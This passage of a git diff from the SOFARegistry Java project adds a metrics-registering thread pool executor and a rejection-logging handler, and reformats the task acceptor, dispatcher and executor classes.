licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.metrics.TaskMetrics; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.concurrent.*; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-15 11:50 yuzhi.lyz Exp $ + */ +public class MetricsableThreadPoolExecutor extends ThreadPoolExecutor { + private static final Logger LOGGER = LoggerFactory.getLogger(MetricsableThreadPoolExecutor.class); + + protected final String executorName; + + public MetricsableThreadPoolExecutor( + String executorName, + int corePoolSize, + int maximumPoolSize, + long keepAliveTime, + TimeUnit unit, + BlockingQueue workQueue, + ThreadFactory threadFactory, + RejectedExecutionHandler handler) { + super(corePoolSize, maximumPoolSize, keepAliveTime, unit, workQueue, threadFactory); + this.executorName = executorName; + registerTaskMetrics(); + this.setRejectedExecutionHandler(handler); + } + + public MetricsableThreadPoolExecutor( + String executorName, + int corePoolSize, + int maximumPoolSize, + long keepAliveTime, + TimeUnit unit, + BlockingQueue workQueue, + ThreadFactory threadFactory) { + this( + executorName, + corePoolSize, + maximumPoolSize, + keepAliveTime, + unit, + workQueue, + threadFactory, + new RejectedLogErrorHandler(LOGGER, true)); + } + + private void registerTaskMetrics() { + TaskMetrics.getInstance().registerThreadExecutor(executorName, this); + } + + @Override + public String toString() { + return StringFormatter.format("{}:{}", executorName, super.toString()); + } + + public static MetricsableThreadPoolExecutor newExecutor( + String executorName, int corePoolSize, int size, RejectedExecutionHandler handler) { + return new MetricsableThreadPoolExecutor( + executorName, + corePoolSize, + corePoolSize, + 60, + TimeUnit.SECONDS, + size <= 1024 * 4 ? new ArrayBlockingQueue<>(size) : new LinkedBlockingQueue<>(size), + new NamedThreadFactory(executorName, true), + handler); + } + + public static MetricsableThreadPoolExecutor newExecutor( + String executorName, int corePoolSize, int size) { + return newExecutor(executorName, corePoolSize, size, new RejectedLogErrorHandler(LOGGER, true)); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/RejectedLogErrorHandler.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/RejectedLogErrorHandler.java new file mode 100644 index 000000000..0f481dfe4 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/RejectedLogErrorHandler.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.util.StringFormatter; +import java.util.concurrent.RejectedExecutionException; +import java.util.concurrent.RejectedExecutionHandler; +import java.util.concurrent.ThreadPoolExecutor; + +public final class RejectedLogErrorHandler implements RejectedExecutionHandler { + private final Logger logger; + private final boolean throwException; + + public RejectedLogErrorHandler(Logger logger, boolean throwException) { + this.logger = logger; + this.throwException = throwException; + } + + @Override + public void rejectedExecution(Runnable r, ThreadPoolExecutor executor) { + String msg = StringFormatter.format("Task {}: {} rejected from {}", r.getClass(), r, executor); + logger.error(msg); + if (throwException) { + throw new RejectedExecutionException(msg); + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/Retryable.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/Retryable.java index 7aafd2579..4b7ffa15a 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/Retryable.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/Retryable.java @@ -17,15 +17,11 @@ package com.alipay.sofa.registry.task; /** - * * @author shangyu.wh * @version $Id: Retryable.java, v 0.1 2018-02-07 11:31 shangyu.wh Exp $ */ public interface Retryable { - /** - * - * @return - */ - boolean checkRetryTimes(); -} \ No newline at end of file + /** @return */ + boolean checkRetryTimes(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/Task.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/Task.java index 6621f82f4..b59857e9c 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/Task.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/Task.java @@ -19,33 +19,20 @@ import com.alipay.sofa.registry.task.listener.TaskEvent; /** - * * @author shangyu.wh * @version $Id: Task.java, v 0.1 2018-01-15 14:23 shangyu.wh Exp $ */ public interface Task { - /** - * - * @return - */ - long getExpiryTime(); + /** @return */ + long getExpiryTime(); - /** - * - * @return - */ - String getTaskId(); + /** @return */ + String getTaskId(); - /** - * - * @param taskEvent - */ - void setTaskEvent(TaskEvent taskEvent); + /** @param taskEvent */ + void setTaskEvent(TaskEvent taskEvent); - /** - * - * @throws Throwable - */ - void execute() throws Throwable; -} \ No newline at end of file + /** @throws Throwable */ + void execute() throws Throwable; +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskClosure.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskClosure.java deleted file mode 100644 index 4e3668571..000000000 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskClosure.java +++ /dev/null @@ -1,34 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.task; - -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; - -/** - * - * @author shangyu.wh - * @version $Id: TaskClosture.java, v 0.1 2018-06-04 17:08 shangyu.wh Exp $ - */ -public interface TaskClosure { - - /** - * - * @param processingResult - * @param task - */ - void run(ProcessingResult processingResult, Task task); -} \ No newline at end of file diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskErrorSilenceException.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskErrorSilenceException.java new file mode 100644 index 000000000..4d1d09a7a --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/TaskErrorSilenceException.java @@ -0,0 +1,21 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +public class TaskErrorSilenceException extends RuntimeException { + public static final TaskErrorSilenceException INSTANCE = new TaskErrorSilenceException(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/AcceptorExecutor.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/AcceptorExecutor.java index c0a26d410..c31ac203d 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/AcceptorExecutor.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/AcceptorExecutor.java @@ -19,7 +19,6 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; - import java.util.Deque; import java.util.HashMap; import java.util.LinkedList; @@ -36,285 +35,282 @@ /** * An active object with an internal thread accepting tasks from clients, and dispatching them to - * workers in a pull based manner. Workers explicitly request an item or a batch of items whenever they are - * available. This guarantees that data to be processed are always up to date, and no stale data processing is done. + * workers in a pull based manner. Workers explicitly request an item or a batch of items whenever + * they are available. This guarantees that data to be processed are always up to date, and no stale + * data processing is done. * *

Task identification

- * Each task passed for processing has a corresponding task id. This id is used to remove duplicates (replace - * older copies with newer ones). + * + * Each task passed for processing has a corresponding task id. This id is used to remove duplicates + * (replace older copies with newer ones). * *

Re-processing

- * If data processing by a worker failed, and the failure is transient in nature, the worker will put back the - * task(s) back to the {@link AcceptorExecutor}. This data will be merged with current workload, possibly discarded if - * a newer version has been already received. + * + * If data processing by a worker failed, and the failure is transient in nature, the worker will + * put back the task(s) back to the {@link AcceptorExecutor}. This data will be merged with current + * workload, possibly discarded if a newer version has been already received. * * @author Tomasz Bak - * @author shangyu.wh modify * @version $Id: AcceptorExecutor.java, v 0.1 2017-11-14 15:35 shangyu.wh Exp $ */ public class AcceptorExecutor { - private static final Logger LOGGER = LoggerFactory - .getLogger(AcceptorExecutor.class); + private static final Logger LOGGER = LoggerFactory.getLogger(AcceptorExecutor.class); - /** - * Get the maximum number of task that can be allowed to back up in the task pool - * Default 10000 - */ - private final int maxBufferSize; + /** + * Get the maximum number of task that can be allowed to back up in the task pool Default 10000 + */ + private final int maxBufferSize; - private final String name; + private final String name; - private final AtomicBoolean isShutdown = new AtomicBoolean( - false); + private final AtomicBoolean isShutdown = new AtomicBoolean(false); - private final BlockingQueue> acceptorQueue = new LinkedBlockingQueue<>(); - private final BlockingDeque> reprocessQueue = new LinkedBlockingDeque<>(); - private final Thread acceptorThread; + private final BlockingQueue> acceptorQueue = new LinkedBlockingQueue<>(); + private final BlockingDeque> reprocessQueue = new LinkedBlockingDeque<>(); + private final Thread acceptorThread; - private final Map> pendingTasks = new HashMap<>(); - private final Deque processingOrder = new LinkedList<>(); + private final Map> pendingTasks = new HashMap<>(); + private final Deque processingOrder = new LinkedList<>(); - private final Semaphore workSemaphore = new Semaphore(0); - private final BlockingQueue> itemWorkQueue = new LinkedBlockingQueue<>(); + private final Semaphore workSemaphore = new Semaphore(0); + private final BlockingQueue> itemWorkQueue = new LinkedBlockingQueue<>(); - private final Semaphore batchWorkRequests = new Semaphore(0); - private final BlockingQueue>> batchWorkQueue = new LinkedBlockingQueue<>(); + private final Semaphore batchWorkRequests = new Semaphore(0); + private final BlockingQueue>> batchWorkQueue = new LinkedBlockingQueue<>(); - private final TrafficShaper trafficShaper; + private final TrafficShaper trafficShaper; - private AtomicLong acceptedTasks = new AtomicLong(); + private AtomicLong acceptedTasks = new AtomicLong(); - private AtomicLong replayedTasks = new AtomicLong(); + private AtomicLong replayedTasks = new AtomicLong(); - private AtomicLong expiredTasks = new AtomicLong(); + private AtomicLong expiredTasks = new AtomicLong(); - private AtomicLong overriddenTasks = new AtomicLong(); + private AtomicLong overriddenTasks = new AtomicLong(); - private AtomicLong queueOverflows = new AtomicLong(); + private AtomicLong queueOverflows = new AtomicLong(); - AcceptorExecutor(String id, int maxBufferSize, long congestionRetryDelayMs, - long networkFailureRetryMs) { - this.name = "TaskAcceptor-" + id; - this.maxBufferSize = maxBufferSize; - this.trafficShaper = new TrafficShaper(congestionRetryDelayMs, networkFailureRetryMs); + AcceptorExecutor( + String id, int maxBufferSize, long congestionRetryDelayMs, long networkFailureRetryMs) { + this.name = "TaskAcceptor-" + id; + this.maxBufferSize = maxBufferSize; + this.trafficShaper = new TrafficShaper(congestionRetryDelayMs, networkFailureRetryMs); - ThreadGroup threadGroup = new ThreadGroup("serverTaskExecutors"); - this.acceptorThread = new Thread(threadGroup, new AcceptorRunner(), "TaskAcceptor-" + id); - this.acceptorThread.setDaemon(true); - this.acceptorThread.start(); + ThreadGroup threadGroup = new ThreadGroup("serverTaskExecutors"); + this.acceptorThread = new Thread(threadGroup, new AcceptorRunner(), "TaskAcceptor-" + id); + this.acceptorThread.setDaemon(true); + this.acceptorThread.start(); + } - } + void process(ID id, T task, long expiryTime) { + acceptorQueue.add(new TaskHolder<>(id, task, expiryTime)); + acceptedTasks.incrementAndGet(); + } - void process(ID id, T task, long expiryTime) { - acceptorQueue.add(new TaskHolder<>(id, task, expiryTime)); - acceptedTasks.incrementAndGet(); - } + void reprocess(TaskHolder taskHolder, ProcessingResult processingResult) { + reprocessQueue.add(taskHolder); + replayedTasks.incrementAndGet(); + trafficShaper.registerFailure(processingResult); + } - void reprocess(TaskHolder taskHolder, ProcessingResult processingResult) { - reprocessQueue.add(taskHolder); - replayedTasks.incrementAndGet(); - trafficShaper.registerFailure(processingResult); - } + BlockingQueue> requestWorkItem() { + workSemaphore.release(); + return itemWorkQueue; + } - BlockingQueue> requestWorkItem() { - workSemaphore.release(); - return itemWorkQueue; - } + BlockingQueue>> requestWorkItems() { + batchWorkRequests.release(); + return batchWorkQueue; + } - BlockingQueue>> requestWorkItems() { - batchWorkRequests.release(); - return batchWorkQueue; + void shutdown() { + if (isShutdown.compareAndSet(false, true)) { + acceptorThread.interrupt(); } - - void shutdown() { - if (isShutdown.compareAndSet(false, true)) { - acceptorThread.interrupt(); + } + + class AcceptorRunner implements Runnable { + @Override + public void run() { + long scheduleTime = 0; + while (!isShutdown.get()) { + try { + drainInputQueues(); + + int totalItems = processingOrder.size(); + + long now = System.currentTimeMillis(); + if (scheduleTime < now) { + scheduleTime = now + trafficShaper.transmissionDelay(); + } + if (scheduleTime <= now) { + assignItemWork(); + } + + if (totalItems == processingOrder.size()) { + Thread.sleep(10); + } + } catch (InterruptedException ex) { + // Ignore + } catch (Throwable e) { + LOGGER.warn("AcceptorThread error", e); } + } } - class AcceptorRunner implements Runnable { - @Override - public void run() { - long scheduleTime = 0; - while (!isShutdown.get()) { - try { - drainInputQueues(); - - int totalItems = processingOrder.size(); - - long now = System.currentTimeMillis(); - if (scheduleTime < now) { - scheduleTime = now + trafficShaper.transmissionDelay(); - } - if (scheduleTime <= now) { - assignItemWork(); - } - - if (totalItems == processingOrder.size()) { - Thread.sleep(10); - } - } catch (InterruptedException ex) { - // Ignore - } catch (Throwable e) { - LOGGER.warn("AcceptorThread error", e); - } - } - } - - private boolean isFull() { - return pendingTasks.size() >= maxBufferSize; - } - - private void drainInputQueues() throws InterruptedException { - do { - drainReprocessQueue(); - drainAcceptorQueue(); - - if (!isShutdown.get()) { - // If all queues are empty, block for a while on the acceptor queue - if (reprocessQueue.isEmpty() && acceptorQueue.isEmpty() - && pendingTasks.isEmpty()) { - TaskHolder taskHolder = acceptorQueue - .poll(10, TimeUnit.MILLISECONDS); - if (taskHolder != null) { - appendTaskHolder(taskHolder); - } - } - } - } while (!reprocessQueue.isEmpty() || !acceptorQueue.isEmpty() - || pendingTasks.isEmpty()); - } - - private void drainAcceptorQueue() { - while (!acceptorQueue.isEmpty()) { - appendTaskHolder(acceptorQueue.poll()); - } - } - - private void drainReprocessQueue() { - long now = System.currentTimeMillis(); - while (!reprocessQueue.isEmpty() && !isFull()) { - TaskHolder taskHolder = reprocessQueue.pollLast(); - ID id = taskHolder.getId(); - //expiryTime < 0 means task no expired - if (taskHolder.getExpiryTime() > 0 && taskHolder.getExpiryTime() <= now) { - expiredTasks.incrementAndGet(); - } else if (pendingTasks.containsKey(id)) { - overriddenTasks.incrementAndGet(); - } else { - pendingTasks.put(id, taskHolder); - processingOrder.addFirst(id); - } - } - if (isFull()) { - LOGGER - .error( - "Now pending task full,it will clear reprocessQueue in to add new task,reprocessQueue size={},queueOverflows={},name={}", - reprocessQueue.size(), queueOverflows, name); - queueOverflows.addAndGet(reprocessQueue.size()); - reprocessQueue.clear(); - } - } - - private void appendTaskHolder(TaskHolder taskHolder) { - if (isFull()) { - LOGGER - .error( - "Now pending task full,it will remove first one to add task={},queueOverflows={},name={}", - taskHolder.getId(), queueOverflows, name); - pendingTasks.remove(processingOrder.poll()); - queueOverflows.incrementAndGet(); - } - TaskHolder previousTask = pendingTasks.put(taskHolder.getId(), taskHolder); - if (previousTask == null) { - processingOrder.add(taskHolder.getId()); - } else { - overriddenTasks.incrementAndGet(); - } - } + private boolean isFull() { + return pendingTasks.size() >= maxBufferSize; + } - void assignItemWork() { - if (!processingOrder.isEmpty()) { - if (workSemaphore.tryAcquire(1)) { - long now = System.currentTimeMillis(); - while (!processingOrder.isEmpty()) { - ID id = processingOrder.poll(); - TaskHolder holder = pendingTasks.remove(id); - //expiryTime < 0 means task no expired - if (holder.getExpiryTime() < 0 || holder.getExpiryTime() > now) { - itemWorkQueue.add(holder); - return; - } - expiredTasks.incrementAndGet(); - } - workSemaphore.release(); - } + private void drainInputQueues() throws InterruptedException { + do { + drainReprocessQueue(); + drainAcceptorQueue(); + + if (!isShutdown.get()) { + // If all queues are empty, block for a while on the acceptor queue + if (reprocessQueue.isEmpty() && acceptorQueue.isEmpty() && pendingTasks.isEmpty()) { + TaskHolder taskHolder = acceptorQueue.poll(10, TimeUnit.MILLISECONDS); + if (taskHolder != null) { + appendTaskHolder(taskHolder); } + } } - + } while (!reprocessQueue.isEmpty() || !acceptorQueue.isEmpty() || pendingTasks.isEmpty()); } - /** - * Getter method for property maxBufferSize. - * - * @return property value of maxBufferSize - */ - public int getMaxBufferSize() { - return maxBufferSize; + private void drainAcceptorQueue() { + while (!acceptorQueue.isEmpty()) { + appendTaskHolder(acceptorQueue.poll()); + } } - /** - * Getter method for property acceptedTasks. - * - * @return property value of acceptedTasks - */ - public AtomicLong getAcceptedTasks() { - return acceptedTasks; - } - - /** - * Getter method for property replayedTasks. - * - * @return property value of replayedTasks - */ - public AtomicLong getReplayedTasks() { - return replayedTasks; - } - - /** - * Getter method for property expiredTasks. - * - * @return property value of expiredTasks - */ - public AtomicLong getExpiredTasks() { - return expiredTasks; - } - - /** - * Getter method for property overriddenTasks. - * - * @return property value of overriddenTasks - */ - public AtomicLong getOverriddenTasks() { - return overriddenTasks; + private void drainReprocessQueue() { + long now = System.currentTimeMillis(); + while (!reprocessQueue.isEmpty() && !isFull()) { + TaskHolder taskHolder = reprocessQueue.pollLast(); + ID id = taskHolder.getId(); + // expiryTime < 0 means task no expired + if (taskHolder.getExpiryTime() > 0 && taskHolder.getExpiryTime() <= now) { + expiredTasks.incrementAndGet(); + } else if (pendingTasks.containsKey(id)) { + overriddenTasks.incrementAndGet(); + } else { + pendingTasks.put(id, taskHolder); + processingOrder.addFirst(id); + } + } + if (isFull()) { + LOGGER.error( + "Now pending task full,it will clear reprocessQueue in to add new task,reprocessQueue size={},queueOverflows={},name={}", + reprocessQueue.size(), + queueOverflows, + name); + queueOverflows.addAndGet(reprocessQueue.size()); + reprocessQueue.clear(); + } } - /** - * Getter method for property queueOverflows. - * - * @return property value of queueOverflows - */ - public AtomicLong getQueueOverflows() { - return queueOverflows; + private void appendTaskHolder(TaskHolder taskHolder) { + if (isFull()) { + LOGGER.error( + "Now pending task full,it will remove first one to add task={},queueOverflows={},name={}", + taskHolder.getId(), + queueOverflows, + name); + pendingTasks.remove(processingOrder.poll()); + queueOverflows.incrementAndGet(); + } + TaskHolder previousTask = pendingTasks.put(taskHolder.getId(), taskHolder); + if (previousTask == null) { + processingOrder.add(taskHolder.getId()); + } else { + overriddenTasks.incrementAndGet(); + } } - /** - * Get pending task size - * @return - */ - public int getPendingTaskSize() { - return pendingTasks.size(); + void assignItemWork() { + if (!processingOrder.isEmpty()) { + if (workSemaphore.tryAcquire(1)) { + long now = System.currentTimeMillis(); + while (!processingOrder.isEmpty()) { + ID id = processingOrder.poll(); + TaskHolder holder = pendingTasks.remove(id); + // expiryTime < 0 means task no expired + if (holder.getExpiryTime() < 0 || holder.getExpiryTime() > now) { + itemWorkQueue.add(holder); + return; + } + expiredTasks.incrementAndGet(); + } + workSemaphore.release(); + } + } } -} \ No newline at end of file + } + + /** + * Getter method for property maxBufferSize. + * + * @return property value of maxBufferSize + */ + public int getMaxBufferSize() { + return maxBufferSize; + } + + /** + * Getter method for property acceptedTasks. + * + * @return property value of acceptedTasks + */ + public AtomicLong getAcceptedTasks() { + return acceptedTasks; + } + + /** + * Getter method for property replayedTasks. + * + * @return property value of replayedTasks + */ + public AtomicLong getReplayedTasks() { + return replayedTasks; + } + + /** + * Getter method for property expiredTasks. + * + * @return property value of expiredTasks + */ + public AtomicLong getExpiredTasks() { + return expiredTasks; + } + + /** + * Getter method for property overriddenTasks. + * + * @return property value of overriddenTasks + */ + public AtomicLong getOverriddenTasks() { + return overriddenTasks; + } + + /** + * Getter method for property queueOverflows. + * + * @return property value of queueOverflows + */ + public AtomicLong getQueueOverflows() { + return queueOverflows; + } + + /** + * Get pending task size + * + * @return + */ + public int getPendingTaskSize() { + return pendingTasks.size(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatcher.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatcher.java index 3620065ec..c3f1d8de5 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatcher.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatcher.java @@ -17,34 +17,33 @@ package com.alipay.sofa.registry.task.batcher; /** - * Task dispatcher takes task from clients, and delegates their execution to a configurable number of workers. - * The task can be processed one at a time or in batches. Only non-expired tasks are executed, and if a newer - * task with the same id is scheduled for execution, the old one is deleted. Lazy dispatch of work (only on demand) - * to workers, guarantees that data are always up to date, and no stale task processing takes place. + * Task dispatcher takes task from clients, and delegates their execution to a configurable number + * of workers. The task can be processed one at a time or in batches. Only non-expired tasks are + * executed, and if a newer task with the same id is scheduled for execution, the old one is + * deleted. Lazy dispatch of work (only on demand) to workers, guarantees that data are always up to + * date, and no stale task processing takes place. + * *

Task processor

- * A client of this component must provide an implementation of {@link TaskProcessor} interface, which will do - * the actual work of task processing. This implementation must be thread safe, as it is called concurrently by - * multiple threads. * - * @author Tomasz Bak + * A client of this component must provide an implementation of {@link TaskProcessor} interface, + * which will do the actual work of task processing. This implementation must be thread safe, as it + * is called concurrently by multiple threads. * + * @author Tomasz Bak * @author shangyu.wh modify * @version $Id: TaskDispatcher.java, v 0.1 2017-11-14 15:23 shangyu.wh Exp $ */ public interface TaskDispatcher { - /** - * - * @param id - * @param task - * @param expiryTime - */ - void dispatch(ID id, T task, long expiryTime); + /** + * @param id + * @param task + * @param expiryTime + */ + void dispatch(ID id, T task, long expiryTime); - /** - * - */ - void shutdown(); + /** */ + void shutdown(); - AcceptorExecutor getAcceptorExecutor(); -} \ No newline at end of file + AcceptorExecutor getAcceptorExecutor(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatchers.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatchers.java index c7a2d32e6..f20dbea45 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatchers.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskDispatchers.java @@ -23,125 +23,124 @@ * See {@link TaskDispatcher} for an overview. * * @author Tomasz Bak - * * @author shangyu.wh modify * @version $Id: TaskDispatchers.java, v 0.1 2017-11-14 16:11 shangyu.wh Exp $ */ public class TaskDispatchers { - private static Map taskDispatcherMap = new ConcurrentHashMap<>(); - - private static final String TASK_DISPATCHER_END = "Dispatcher"; - - /** - * @param id - * @param taskProcessor - * @param - * @param - * @return - */ - public static TaskDispatcher createDefaultSingleTaskDispatcher(String id, - TaskProcessor taskProcessor) { - final String name = getDispatcherName(id); - - TaskDispatcher taskDispatcher = taskDispatcherMap.computeIfAbsent(name, - k->{ - - final AcceptorExecutor acceptorExecutor = new AcceptorExecutor( - name, 1000, 1000, 100 - ); - final TaskExecutors taskExecutor = TaskExecutors.createTaskExecutors(name, 20, taskProcessor, - acceptorExecutor); - - return new TaskDispatcher() { - @Override - public void dispatch(ID id, T task, long expiryTime) { - acceptorExecutor.process(id, task, expiryTime); - } - - @Override - public void shutdown() { - acceptorExecutor.shutdown(); - taskExecutor.shutdown(); - } - - @Override - public AcceptorExecutor getAcceptorExecutor() { - return acceptorExecutor; - } - }; - }); - return taskDispatcher; - } - - /** - * - */ - public static void stopDefaultSingleTaskDispatcher() { - taskDispatcherMap.forEach((k, v) -> { - if (v != null) { - v.shutdown(); - } - }); - } - - /** - * @param id - * @param maxBufferSize - * @param workerCount - * @param congestionRetryDelayMs - * @param networkFailureRetryMs - * @param taskProcessor - * @param - * @param - * @return - */ - public static TaskDispatcher createSingleTaskDispatcher(String id, - int maxBufferSize, - int workerCount, - long congestionRetryDelayMs, - long networkFailureRetryMs, - TaskProcessor taskProcessor) { - - return taskDispatcherMap.computeIfAbsent(id,k->{ - - final AcceptorExecutor acceptorExecutor = new AcceptorExecutor( - id, maxBufferSize, congestionRetryDelayMs, networkFailureRetryMs - ); - final TaskExecutors taskExecutor = TaskExecutors.createTaskExecutors(id, workerCount, taskProcessor, - acceptorExecutor); - - return new TaskDispatcher() { + private static Map taskDispatcherMap = new ConcurrentHashMap<>(); + + private static final String TASK_DISPATCHER_END = "Dispatcher"; + + /** + * @param id + * @param taskProcessor + * @param + * @param + * @return + */ + public static TaskDispatcher createDefaultSingleTaskDispatcher( + String id, TaskProcessor taskProcessor) { + final String name = getDispatcherName(id); + + TaskDispatcher taskDispatcher = + taskDispatcherMap.computeIfAbsent( + name, + k -> { + final AcceptorExecutor acceptorExecutor = + new AcceptorExecutor(name, 1000, 1000, 100); + final TaskExecutors taskExecutor = + TaskExecutors.createTaskExecutors(name, 20, taskProcessor, acceptorExecutor); + + return new TaskDispatcher() { @Override public void dispatch(ID id, T task, long expiryTime) { - acceptorExecutor.process(id, task, expiryTime); + acceptorExecutor.process(id, task, expiryTime); } @Override public void shutdown() { - acceptorExecutor.shutdown(); - taskExecutor.shutdown(); + acceptorExecutor.shutdown(); + taskExecutor.shutdown(); } @Override public AcceptorExecutor getAcceptorExecutor() { - return acceptorExecutor; + return acceptorExecutor; } - }; + }; + }); + return taskDispatcher; + } + + /** */ + public static void stopDefaultSingleTaskDispatcher() { + taskDispatcherMap.forEach( + (k, v) -> { + if (v != null) { + v.shutdown(); + } }); + } + + /** + * @param id + * @param maxBufferSize + * @param workerCount + * @param congestionRetryDelayMs + * @param networkFailureRetryMs + * @param taskProcessor + * @param + * @param + * @return + */ + public static TaskDispatcher createSingleTaskDispatcher( + String id, + int maxBufferSize, + int workerCount, + long congestionRetryDelayMs, + long networkFailureRetryMs, + TaskProcessor taskProcessor) { + + return taskDispatcherMap.computeIfAbsent( + id, + k -> { + final AcceptorExecutor acceptorExecutor = + new AcceptorExecutor( + id, maxBufferSize, congestionRetryDelayMs, networkFailureRetryMs); + final TaskExecutors taskExecutor = + TaskExecutors.createTaskExecutors(id, workerCount, taskProcessor, acceptorExecutor); + + return new TaskDispatcher() { + @Override + public void dispatch(ID id, T task, long expiryTime) { + acceptorExecutor.process(id, task, expiryTime); + } - } - - public static String getDispatcherName(String name) { - return name + TASK_DISPATCHER_END; - } - - /** - * Getter method for property taskDispatcherMap. - * - * @return property value of taskDispatcherMap - */ - public static Map getTaskDispatcherMap() { - return taskDispatcherMap; - } -} \ No newline at end of file + @Override + public void shutdown() { + acceptorExecutor.shutdown(); + taskExecutor.shutdown(); + } + + @Override + public AcceptorExecutor getAcceptorExecutor() { + return acceptorExecutor; + } + }; + }); + } + + public static String getDispatcherName(String name) { + return name + TASK_DISPATCHER_END; + } + + /** + * Getter method for property taskDispatcherMap. + * + * @return property value of taskDispatcherMap + */ + public static Map getTaskDispatcherMap() { + return taskDispatcherMap; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskExecutors.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskExecutors.java index b9176318e..d78c8d52c 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskExecutors.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskExecutors.java @@ -19,7 +19,6 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; - import java.util.ArrayList; import java.util.List; import java.util.concurrent.BlockingQueue; @@ -28,137 +27,138 @@ import java.util.function.Function; /** - * {@link TaskExecutors} instance holds a number of worker threads that cooperate with {@link AcceptorExecutor}. - * Each worker sends a job request to {@link AcceptorExecutor} whenever it is available, and processes it once - * provided with a task(s). + * {@link TaskExecutors} instance holds a number of worker threads that cooperate with {@link + * AcceptorExecutor}. Each worker sends a job request to {@link AcceptorExecutor} whenever it is + * available, and processes it once provided with a task(s). * * @author Tomasz Bak - * * @author shangyu.wh modify * @version $Id: TaskExecutors.java, v 0.1 2017-11-14 16:00 shangyu.wh Exp $ */ public class TaskExecutors { - private static final Logger LOGGER = LoggerFactory.getLogger(TaskExecutors.class); + private static final Logger LOGGER = LoggerFactory.getLogger(TaskExecutors.class); - private final AtomicBoolean isShutdown; - private final List workerThreads; + private final AtomicBoolean isShutdown; + private final List workerThreads; - /** - * constructor - * @param 